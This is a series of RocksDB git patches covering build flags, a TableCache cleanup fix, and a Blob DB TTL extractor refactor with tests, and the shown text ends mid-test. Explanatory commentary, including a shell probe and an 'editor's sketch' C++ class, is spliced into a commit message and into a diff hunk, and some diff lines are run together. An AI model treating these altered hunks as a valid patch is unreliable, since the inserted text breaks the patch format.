   - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi
diff --git a/Makefile b/Makefile
index c40d741d7a8..55f642135ed 100644
--- a/Makefile
+++ b/Makefile
@@ -575,6 +575,8 @@ endif # PLATFORM_SHARED_EXT
 
 all: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(TESTS)
 
+all_but_some_tests: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(SUBSET)
+
 static_lib: $(LIBRARY)
 
 shared_lib: $(SHARED)
diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc
index 3d732f573ad..cfbe2c5676a 100644
--- a/db/db_basic_test.cc
+++ b/db/db_basic_test.cc
@@ -175,6 +175,8 @@ TEST_F(DBBasicTest, LevelLimitReopen) {
   int i = 0;
   while (NumTableFilesAtLevel(2, 1) == 0) {
     ASSERT_OK(Put(1, Key(i++), value));
+    dbfull()->TEST_WaitForFlushMemTable();
+    dbfull()->TEST_WaitForCompact();
   }
 
   options.num_levels = 1;

From 3a3fb00b7aab66ed9c9c2311c5178314fced9a1e Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 27 Jul 2017 17:34:04 -0700
Subject: [PATCH 054/205] TARGETS file not setting sse explicitly

Summary:
We don't need to set them explicitly.
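For context, build configurations usually discover SSE4.2 support rather than
hardcoding -msse/-msse4.2 for every target. A minimal sketch of such a probe
(hypothetical shell fragment, not the actual Buck or Makefile logic):

    # Compile a one-line program that uses an SSE4.2 intrinsic; add the flag
    # only if the toolchain accepts it.
    printf '#include <nmmintrin.h>\nint main() { return (int)_mm_crc32_u32(0u, 1u); }\n' > /tmp/sse42_probe.c
    if ${CC:-cc} -msse4.2 /tmp/sse42_probe.c -o /dev/null 2>/dev/null; then
      COMPILER_FLAGS="$COMPILER_FLAGS -msse4.2"
    fi

One common reason to avoid hardcoding the flags is that binaries built with
-msse4.2 may execute SSE4.2 instructions unconditionally and crash on older
CPUs.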
Closes https://github.com/facebook/rocksdb/pull/2660

Differential Revision: D5514141

Pulled By: yiwu-arbug

fbshipit-source-id: 10edebfc3cfe0afc00a34519f87fcea4d65069ae
---
 buckifier/targets_cfg.py | 2 --
 1 file changed, 2 deletions(-)

diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py
index 836493951ae..edc0e84556c 100644
--- a/buckifier/targets_cfg.py
+++ b/buckifier/targets_cfg.py
@@ -10,8 +10,6 @@ BUCK_BINS = "buck-out/gen/" + REPO_PATH
 TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh"
 rocksdb_compiler_flags = [
-    "-msse",
-    "-msse4.2",
     "-fno-builtin-memcmp",
     "-DROCKSDB_PLATFORM_POSIX",
     "-DROCKSDB_LIB_IO_POSIX",

From 710411aea6a2c74f7ca912988878d79aeffcefce Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Thu, 27 Jul 2017 20:16:25 -0700
Subject: [PATCH 055/205] fix asan/valgrind for TableCache cleanup

Summary:
Breaking commit: d12691b86fb788f0ee7180db626c4ea2445fa976

In the above commit, I moved the `TableCache` cleanup logic from the `Version`
destructor into `PurgeObsoleteFiles`. I missed cleaning up `TableCache` entries
for the current `Version` during DB destruction. This PR adds that logic to the
`VersionSet` destructor.

One unfortunate side effect is that we're now potentially deleting
`TableReader`s after `column_family_set_.reset()`, which means we can't call
`BlockBasedTableReader::Close` a second time, as the block cache might already
be destroyed.
Closes https://github.com/facebook/rocksdb/pull/2662

Differential Revision: D5515108

Pulled By: ajkr

fbshipit-source-id: 2cb820e19aa813e0d258d17f76b2d7b6b7ee0b18
---
 db/version_set.cc                 | 8 ++++++--
 table/block_based_table_reader.cc | 4 ++++
 table/block_based_table_reader.h  | 1 +
 3 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/db/version_set.cc b/db/version_set.cc
index ffbdd46cd1a..f8465027bb5 100644
--- a/db/version_set.cc
+++ b/db/version_set.cc
@@ -2327,10 +2327,14 @@ void CloseTables(void* ptr, size_t) {
 VersionSet::~VersionSet() {
   // we need to delete column_family_set_ because its destructor depends on
   // VersionSet
-  column_family_set_->get_table_cache()->ApplyToAllCacheEntries(&CloseTables,
-                                                                false);
+  Cache* table_cache = column_family_set_->get_table_cache();
+  table_cache->ApplyToAllCacheEntries(&CloseTables, false /* thread_safe */);
   column_family_set_.reset();
   for (auto file : obsolete_files_) {
+    if (file->table_reader_handle) {
+      table_cache->Release(file->table_reader_handle);
+      TableCache::Evict(table_cache, file->fd.GetNumber());
+    }
     delete file;
   }
   obsolete_files_.clear();
diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc
index 3c4f0b80ee5..a0b58c6b26e 100644
--- a/table/block_based_table_reader.cc
+++ b/table/block_based_table_reader.cc
@@ -2083,6 +2083,9 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) {
 }
 
 void BlockBasedTable::Close() {
+  if (rep_->closed) {
+    return;
+  }
   rep_->filter_entry.Release(rep_->table_options.block_cache.get());
   rep_->index_entry.Release(rep_->table_options.block_cache.get());
   rep_->range_del_entry.Release(rep_->table_options.block_cache.get());
@@ -2099,6 +2102,7 @@ void BlockBasedTable::Close() {
         rep_->dummy_index_reader_offset, cache_key);
     rep_->table_options.block_cache.get()->Erase(key);
   }
+  rep_->closed = true;
 }
 
 Status BlockBasedTable::DumpIndexBlock(WritableFile* out_file) {
diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h
index 8b3494ef56f..3acc3a8fb09 100644
--- a/table/block_based_table_reader.h
+++ b/table/block_based_table_reader.h
@@ -467,6 +467,7 @@ struct BlockBasedTable::Rep {
   // A value of kDisableGlobalSequenceNumber means that this feature is disabled
   // and every key have it's own seqno.
   SequenceNumber global_seqno;
+  bool closed = false;
 };
 
 }  // namespace rocksdb

From 6083bc79f898fffcce5fca1e5c9f8932c62da4a1 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 27 Jul 2017 23:16:18 -0700
Subject: [PATCH 056/205] Blob DB TTL extractor

Summary:
Introducing blob_db::TTLExtractor to replace extract_ttl_fn. The TTL extractor
can be used to extract TTL from keys inserted with Put or WriteBatch. Changes
over the existing extract_ttl_fn are:
* If the value is changed, it will be returned via std::string* (rather than
  Slice*). With Slice* the new value has to be part of the existing value.
  With std::string* that limitation is removed.
* It can optionally return either a TTL or an expiration time.

Other changes in this PR:
* replace `std::chrono::system_clock` with `Env::NowMicros` so that I can mock
  time in tests.
* add several TTL tests.
* other minor naming changes.
Closes https://github.com/facebook/rocksdb/pull/2659

Differential Revision: D5512627

Pulled By: yiwu-arbug

fbshipit-source-id: 0dfcb00d74d060b8534c6130c808e4d5d0a54440
---
 CMakeLists.txt                      | 1 +
 TARGETS                             | 1 +
 src.mk                              | 1 +
 utilities/blob_db/blob_db.cc        | 2 -
 utilities/blob_db/blob_db.h         | 23 +-
 utilities/blob_db/blob_db_impl.cc   | 162 +++++++---------
 utilities/blob_db/blob_db_impl.h    | 36 +++-
 utilities/blob_db/blob_db_test.cc   | 276 +++++++++++++++++++++++++++-
 utilities/blob_db/blob_log_format.h | 5 +
 utilities/blob_db/ttl_extractor.cc  | 31 ++++
 utilities/blob_db/ttl_extractor.h   | 43 +++++
 11 files changed, 460 insertions(+), 121 deletions(-)
 create mode 100644 utilities/blob_db/ttl_extractor.cc
 create mode 100644 utilities/blob_db/ttl_extractor.h

diff --git a/CMakeLists.txt b/CMakeLists.txt
index 1eb98b2265b..2fede71c026 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -482,6 +482,7 @@ set(SOURCES
         utilities/blob_db/blob_log_reader.cc
         utilities/blob_db/blob_log_writer.cc
         utilities/blob_db/blob_log_format.cc
+        utilities/blob_db/ttl_extractor.cc
         utilities/cassandra/cassandra_compaction_filter.cc
         utilities/cassandra/format.cc
         utilities/cassandra/merge_operator.cc
diff --git a/TARGETS b/TARGETS
index 4124eec4e99..525e5d38bc0 100644
--- a/TARGETS
+++ b/TARGETS
@@ -211,6 +211,7 @@ cpp_library(
         "utilities/blob_db/blob_log_reader.cc",
         "utilities/blob_db/blob_log_writer.cc",
         "utilities/blob_db/blob_log_format.cc",
+        "utilities/blob_db/ttl_extractor.cc",
         "utilities/cassandra/cassandra_compaction_filter.cc",
         "utilities/cassandra/format.cc",
         "utilities/cassandra/merge_operator.cc",
diff --git a/src.mk b/src.mk
index fb7f979396c..014287ce0a5 100644
--- a/src.mk
+++ b/src.mk
@@ -159,6 +159,7 @@ LIB_SOURCES = \
   utilities/blob_db/blob_log_reader.cc \
   utilities/blob_db/blob_log_writer.cc \
   utilities/blob_db/blob_log_format.cc \
+  utilities/blob_db/ttl_extractor.cc \
   utilities/cassandra/cassandra_compaction_filter.cc \
   utilities/cassandra/format.cc \
   utilities/cassandra/merge_operator.cc \
diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc
index e2defe97ca0..ea60ad59b47 100644
--- a/utilities/blob_db/blob_db.cc
+++ b/utilities/blob_db/blob_db.cc
@@ -17,7 +17,6 @@
 #include "table/block.h"
 #include "table/block_based_table_builder.h"
 #include "table/block_builder.h"
-#include "util/crc32c.h"
 #include "util/file_reader_writer.h"
 #include "util/filename.h"
 #include "utilities/blob_db/blob_db_impl.h"
@@ -163,7 +162,6 @@ BlobDBOptions::BlobDBOptions()
       bytes_per_sync(0),
       blob_file_size(256 * 1024 * 1024),
num_concurrent_simple_blobs(4), - default_ttl_extractor(false), compression(kNoCompression) {} } // namespace blob_db diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index f45a42f60a9..dfb21383dda 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -13,6 +13,7 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/stackable_db.h" +#include "utilities/blob_db/ttl_extractor.h" namespace rocksdb { @@ -64,15 +65,10 @@ struct BlobDBOptions { // how many files to use for simple blobs at one time uint32_t num_concurrent_simple_blobs; - // this function is to be provided by client if they intend to - // use Put API to provide TTL. - // the first argument is the value in the Put API - // in case you want to do some modifications to the value, - // return a new Slice in the second. - // otherwise just copy the input value into output. - // the ttl should be extracted and returned in last pointer. - // otherwise assign it to -1 - std::function extract_ttl_fn; + // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, + // applications can set a TTLExtractor which can extract TTL from key-value + // pairs. + std::shared_ptr ttl_extractor; // eviction callback. // this function will be called for every blob that is getting @@ -80,9 +76,6 @@ struct BlobDBOptions { std::function gc_evict_cb_fn; - // default ttl extactor - bool default_ttl_extractor; - // what compression to use for Blob's CompressionType compression; @@ -95,10 +88,6 @@ struct BlobDBOptions { }; class BlobDB : public StackableDB { - public: - // the suffix to a blob value to represent "ttl:TTLVAL" - static const uint64_t kTTLSuffixLength = 8; - public: using rocksdb::StackableDB::Put; @@ -120,6 +109,8 @@ class BlobDB : public StackableDB { return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); } + // Put with expiration. Key with expiration time equal to -1 + // means the key don't expire. virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, int32_t expiration) = 0; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1dd72b6bc3a..95deda5b0cc 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -6,9 +6,7 @@ #include "utilities/blob_db/blob_db_impl.h" #include -#include #include -#include #include #include #include @@ -58,17 +56,6 @@ namespace rocksdb { namespace blob_db { -struct GCStats { - uint64_t blob_count = 0; - uint64_t num_deletes = 0; - uint64_t deleted_size = 0; - uint64_t num_relocs = 0; - uint64_t succ_deletes_lsm = 0; - uint64_t overrided_while_delete = 0; - uint64_t succ_relocs = 0; - std::shared_ptr newfile = nullptr; -}; - // BlobHandle is a pointer to the blob that is stored in the LSM class BlobHandle { public: @@ -192,7 +179,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, const DBOptions& db_options) : BlobDB(nullptr), db_impl_(nullptr), - myenv_(db_options.env), + env_(db_options.env), + ttl_extractor_(blob_db_options.ttl_extractor.get()), wo_set_(false), bdb_options_(blob_db_options), db_options_(db_options), @@ -218,10 +206,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, blob_dir_ = (bdb_options_.path_relative) ? 
dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; - - if (bdb_options_.default_ttl_extractor) { - bdb_options_.extract_ttl_fn = &BlobDBImpl::ExtractTTLFromBlob; - } } Status BlobDBImpl::LinkToBaseDB(DB* db) { @@ -238,17 +222,17 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { db_impl_ = dynamic_cast(db); } - myenv_ = db_->GetEnv(); + env_ = db_->GetEnv(); opt_db_.reset(new OptimisticTransactionDBImpl(db, false)); - Status s = myenv_->CreateDirIfMissing(blob_dir_); + Status s = env_->CreateDirIfMissing(blob_dir_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to create blob directory: %s status: '%s'", blob_dir_.c_str(), s.ToString().c_str()); } - s = myenv_->NewDirectory(blob_dir_, &dir_ent_); + s = env_->NewDirectory(blob_dir_, &dir_ent_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to open blob directory: %s status: '%s'", @@ -293,10 +277,6 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; - - if (bdb_options_.default_ttl_extractor) { - bdb_options_.extract_ttl_fn = &BlobDBImpl::ExtractTTLFromBlob; - } } BlobDBImpl::~BlobDBImpl() { @@ -311,7 +291,7 @@ Status BlobDBImpl::OpenPhase1() { return Status::NotSupported("No blob directory in options"); std::unique_ptr dir_ent; - Status s = myenv_->NewDirectory(blob_dir_, &dir_ent); + Status s = env_->NewDirectory(blob_dir_, &dir_ent); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to open blob directory: %s status: '%s'", @@ -366,7 +346,7 @@ void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) { Status BlobDBImpl::GetAllLogFiles( std::set>* file_nums) { std::vector all_files; - Status status = myenv_->GetChildren(blob_dir_, &all_files); + Status status = env_->GetChildren(blob_dir_, &all_files); if (!status.ok()) { return status; } @@ -413,7 +393,7 @@ Status BlobDBImpl::OpenAllFiles() { for (auto f_iter : file_nums) { std::string bfpath = BlobFileName(blob_dir_, f_iter.first); uint64_t size_bytes; - Status s1 = myenv_->GetFileSize(bfpath, &size_bytes); + Status s1 = env_->GetFileSize(bfpath, &size_bytes); if (!s1.ok()) { ROCKS_LOG_WARN( db_options_.info_log, @@ -436,7 +416,7 @@ Status BlobDBImpl::OpenAllFiles() { // read header std::shared_ptr reader; - reader = bfptr->OpenSequentialReader(myenv_, db_options_, env_options_); + reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_); s1 = reader->ReadHeader(&bfptr->header_); if (!s1.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -448,7 +428,7 @@ Status BlobDBImpl::OpenAllFiles() { bfptr->header_valid_ = true; std::shared_ptr ra_reader = - GetOrOpenRandomAccessReader(bfptr, myenv_, env_options_); + GetOrOpenRandomAccessReader(bfptr, env_, env_options_); BlobLogFooter bf; s1 = bfptr->ReadFooter(&bf); @@ -586,13 +566,13 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { EnvOptions env_options = env_options_; env_options.writable_file_max_buffer_size = 0; - Status s = myenv_->ReopenWritableFile(fpath, &wfile, env_options); + Status s = env_->ReopenWritableFile(fpath, &wfile, env_options); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to open blob file for write: %s status: '%s'" " exists: '%s'", fpath.c_str(), s.ToString().c_str(), - myenv_->FileExists(fpath).ToString().c_str()); + env_->FileExists(fpath).ToString().c_str()); return s; } @@ -788,39 +768,13 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { return bfile; } -bool 
BlobDBImpl::ExtractTTLFromBlob(const Slice& value, Slice* newval, - int32_t* ttl_val) { - *newval = value; - *ttl_val = -1; - if (value.size() <= BlobDB::kTTLSuffixLength) return false; - - int32_t ttl_tmp = - DecodeFixed32(value.data() + value.size() - sizeof(int32_t)); - std::string ttl_exp(value.data() + value.size() - BlobDB::kTTLSuffixLength, - 4); - if (ttl_exp != "ttl:") return false; - - newval->remove_suffix(BlobDB::kTTLSuffixLength); - *ttl_val = ttl_tmp; - return true; -} - -//////////////////////////////////////////////////////////////////////////////// -// A specific pattern is looked up at the end of the value part. -// ttl:TTLVAL . if this pattern is found, PutWithTTL is called, otherwise -// regular Put is called. -//////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) { - Slice newval; - int32_t ttl_val; - if (bdb_options_.extract_ttl_fn) { - bdb_options_.extract_ttl_fn(value, &newval, &ttl_val); - return PutWithTTL(options, column_family, key, newval, ttl_val); - } - - return PutWithTTL(options, column_family, key, value, -1); + std::string new_value; + Slice value_slice; + int32_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + return PutUntil(options, column_family, key, value_slice, expiration); } Status BlobDBImpl::Delete(const WriteOptions& options, @@ -852,6 +806,7 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Status batch_rewrite_status_; std::shared_ptr last_file_; bool has_put_; + std::string new_value_; public: explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) @@ -866,23 +821,13 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { bool has_put() { return has_put_; } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value_unc) override { - Slice newval; - int32_t ttl_val = -1; - if (impl_->bdb_options_.extract_ttl_fn) { - impl_->bdb_options_.extract_ttl_fn(value_unc, &newval, &ttl_val); - } else { - newval = value_unc; - } + const Slice& value_slice) override { + Slice value_unc; + int32_t expiration = + impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); - int32_t expiration = -1; - if (ttl_val != -1) { - std::time_t cur_t = std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now()); - expiration = ttl_val + static_cast(cur_t); - } std::shared_ptr bfile = - (ttl_val != -1) + (expiration != -1) ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { @@ -1004,12 +949,8 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, int32_t ttl) { - return PutUntil( - options, column_family, key, value, - (ttl != -1) - ? ttl + static_cast(std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now())) - : -1); + return PutUntil(options, column_family, key, value, + static_cast(EpochNow()) + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -1024,6 +965,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } +// TODO(yiwu): We should use uint64_t for expiration. 
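For illustration, here is a minimal custom extractor against the TTLExtractor interface this patch introduces. This is an editor's sketch, not part of the diff; the option wiring shown in the trailing comment is an assumption based on the ttl_extractor field added to BlobDBOptions above.
```cpp
// Sketch only: gives every key written through plain Put() a fixed
// one-hour TTL and leaves the value untouched. The interface (ExtractTTL
// returning bool, TTL passed back via *ttl) comes from the new
// utilities/blob_db/ttl_extractor.h added by this patch.
#include "utilities/blob_db/ttl_extractor.h"

class FixedTTLExtractor : public rocksdb::blob_db::TTLExtractor {
 public:
  bool ExtractTTL(const rocksdb::Slice& /*key*/,
                  const rocksdb::Slice& /*value*/, uint64_t* ttl,
                  std::string* /*new_value*/,
                  bool* /*value_changed*/) override {
    *ttl = 3600;  // one hour
    return true;  // true means "this key has a TTL"
  }
};

// Hypothetical wiring (the Open call itself is not shown in this patch):
//   rocksdb::blob_db::BlobDBOptions bdb_options;
//   bdb_options.ttl_extractor = std::make_shared<FixedTTLExtractor>();
```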
Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, int32_t expiration) { @@ -1097,6 +1039,24 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, return s; } +// TODO(yiwu): We should return uint64_t after updating the rest of the code +// to use uint64_t for expiration. +int32_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, + std::string* new_value) { + uint64_t expiration = kNoExpiration; + bool value_changed = false; + if (ttl_extractor_ != nullptr) { + bool has_ttl = ttl_extractor_->ExtractExpiration( + key, value, EpochNow(), &expiration, new_value, &value_changed); + if (!has_ttl) { + expiration = kNoExpiration; + } + } + *value_slice = value_changed ? Slice(*new_value) : value; + return (expiration == kNoExpiration) ? -1 : static_cast(expiration); +} + Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry) { @@ -1240,7 +1200,7 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, // takes locks when called std::shared_ptr reader = - GetOrOpenRandomAccessReader(bfile, myenv_, env_options_); + GetOrOpenRandomAccessReader(bfile, env_, env_options_); if (value != nullptr) { std::string* valueptr = value; @@ -1377,14 +1337,13 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { assert(!bfile->Immutable()); } - std::time_t epoch_now = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + uint64_t epoch_now = EpochNow(); for (auto bfile_pair : blob_files_) { auto bfile = bfile_pair.second; ROCKS_LOG_INFO( db_options_.info_log, - "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %d", + "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64, bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(), bfile->deleted_count_, bfile->deleted_size_, (bfile->ttl_range_.second - epoch_now)); @@ -1603,8 +1562,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { std::vector> process_files; { - std::time_t epoch_now = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + uint64_t epoch_now = EpochNow(); ReadLock rl(&mutex_); for (auto bfile : open_blob_files_) { @@ -1713,11 +1671,10 @@ std::pair BlobDBImpl::WaStats(bool aborted) { //////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GCStats* gcstats) { - std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); - std::time_t tt = std::chrono::system_clock::to_time_t(now); + uint64_t tt = EpochNow(); std::shared_ptr reader = - bfptr->OpenSequentialReader(myenv_, db_options_, env_options_); + bfptr->OpenSequentialReader(env_, db_options_, env_options_); if (!reader) { ROCKS_LOG_ERROR(db_options_.info_log, "File sequential reader could not be opened", @@ -1987,7 +1944,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { } } - Status s = myenv_->DeleteFile(bfile->PathName()); + Status s = env_->DeleteFile(bfile->PathName()); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "File failed to be deleted as obsolete %s", @@ -2019,7 +1976,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { std::shared_ptr reader = - bfile->OpenSequentialReader(myenv_, db_options_, env_options_); + bfile->OpenSequentialReader(env_, db_options_, 
env_options_); if (!reader) { ROCKS_LOG_ERROR( db_options_.info_log, @@ -2264,6 +2221,23 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, auto cfh = reinterpret_cast(DefaultColumnFamily()); return CommonGet(cfh->cfd(), key, index_entry, nullptr, sequence); } + +std::vector> BlobDBImpl::TEST_GetBlobFiles() const { + std::vector> blob_files; + for (auto& p : blob_files_) { + blob_files.emplace_back(p.second); + } + return blob_files; +} + +void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { + CloseSeqWrite(bfile, false /*abort*/); +} + +Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, + GCStats* gc_stats) { + return GCFileAndUpdateLSM(bfile, gc_stats); +} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index a5c5822bb76..8da5bbf6529 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -10,6 +10,7 @@ #include #include #include +#include #include #include #include @@ -45,7 +46,6 @@ namespace blob_db { class BlobFile; class BlobDBImpl; -struct GCStats; class BlobDBFlushBeginListener : public EventListener { public: @@ -134,6 +134,17 @@ struct blobf_compare_ttl { const std::shared_ptr& rhs) const; }; +struct GCStats { + uint64_t blob_count = 0; + uint64_t num_deletes = 0; + uint64_t deleted_size = 0; + uint64_t num_relocs = 0; + uint64_t succ_deletes_lsm = 0; + uint64_t overrided_while_delete = 0; + uint64_t succ_relocs = 0; + std::shared_ptr newfile = nullptr; +}; + /** * The implementation class for BlobDB. This manages the value * part in TTL aware sequentially written files. These files are @@ -147,6 +158,9 @@ class BlobDBImpl : public BlobDB { friend class BlobDBIterator; public: + static constexpr uint64_t kNoExpiration = + std::numeric_limits::max(); + using rocksdb::StackableDB::Put; Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) override; @@ -200,12 +214,16 @@ class BlobDBImpl : public BlobDB { #ifndef NDEBUG Status TEST_GetSequenceNumber(const Slice& key, SequenceNumber* sequence); + + std::vector> TEST_GetBlobFiles() const; + + void TEST_CloseBlobFile(std::shared_ptr& bfile); + + Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, + GCStats* gc_stats); #endif // !NDEBUG private: - static bool ExtractTTLFromBlob(const Slice& value, Slice* newval, - int32_t* ttl_val); - Status OpenPhase1(); Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, @@ -237,6 +255,9 @@ class BlobDBImpl : public BlobDB { // appends a task into timer queue to close the file void CloseIf(const std::shared_ptr& bfile); + int32_t ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, std::string* new_value); + Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry); @@ -346,11 +367,12 @@ class BlobDBImpl : public BlobDB { std::vector>* to_process, uint64_t epoch, uint64_t last_id, size_t files_to_collect); - private: + uint64_t EpochNow() { return env_->NowMicros() / 1000000; } + // the base DB DBImpl* db_impl_; - - Env* myenv_; + Env* env_; + TTLExtractor* ttl_extractor_; // Optimistic Transaction DB used during Garbage collection // for atomicity diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 13ad7a2fa09..6a43f6b77e9 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -25,7 +25,22 @@ class BlobDBTest 
: public testing::Test { public: const int kMaxBlobSize = 1 << 14; - BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), blob_db_(nullptr) { + class MockEnv : public EnvWrapper { + public: + MockEnv() : EnvWrapper(Env::Default()) {} + + void set_now_micros(uint64_t now_micros) { now_micros_ = now_micros; } + + uint64_t NowMicros() override { return now_micros_; } + + private: + uint64_t now_micros_ = 0; + }; + + BlobDBTest() + : dbname_(test::TmpDir() + "/blob_db_test"), + mock_env_(new MockEnv()), + blob_db_(nullptr) { Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions()); assert(s.ok()); } @@ -59,9 +74,25 @@ class BlobDBTest : public testing::Test { } } + void PutRandomUntil(const std::string &key, int32_t expiration, Random *rnd, + std::map *data = nullptr) { + int len = rnd->Next() % kMaxBlobSize + 1; + std::string value = test::RandomHumanReadableString(rnd, len); + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), Slice(key), Slice(value), + expiration)); + if (data != nullptr) { + (*data)[key] = value; + } + } + void PutRandom(const std::string &key, Random *rnd, std::map *data = nullptr) { - PutRandomWithTTL(key, -1, rnd, data); + int len = rnd->Next() % kMaxBlobSize + 1; + std::string value = test::RandomHumanReadableString(rnd, len); + ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value))); + if (data != nullptr) { + (*data)[key] = value; + } } void PutRandomToWriteBatch( @@ -115,6 +146,8 @@ class BlobDBTest : public testing::Test { } const std::string dbname_; + std::unique_ptr mock_env_; + std::shared_ptr ttl_extractor_; BlobDB *blob_db_; }; // class BlobDBTest @@ -130,6 +163,245 @@ TEST_F(BlobDBTest, Put) { VerifyDB(data); } +TEST_F(BlobDBTest, PutWithTTL) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int32_t ttl = rnd.Next() % 100; + PutRandomWithTTL("key" + ToString(i), ttl, &rnd, + (ttl < 50 ? nullptr : &data)); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + 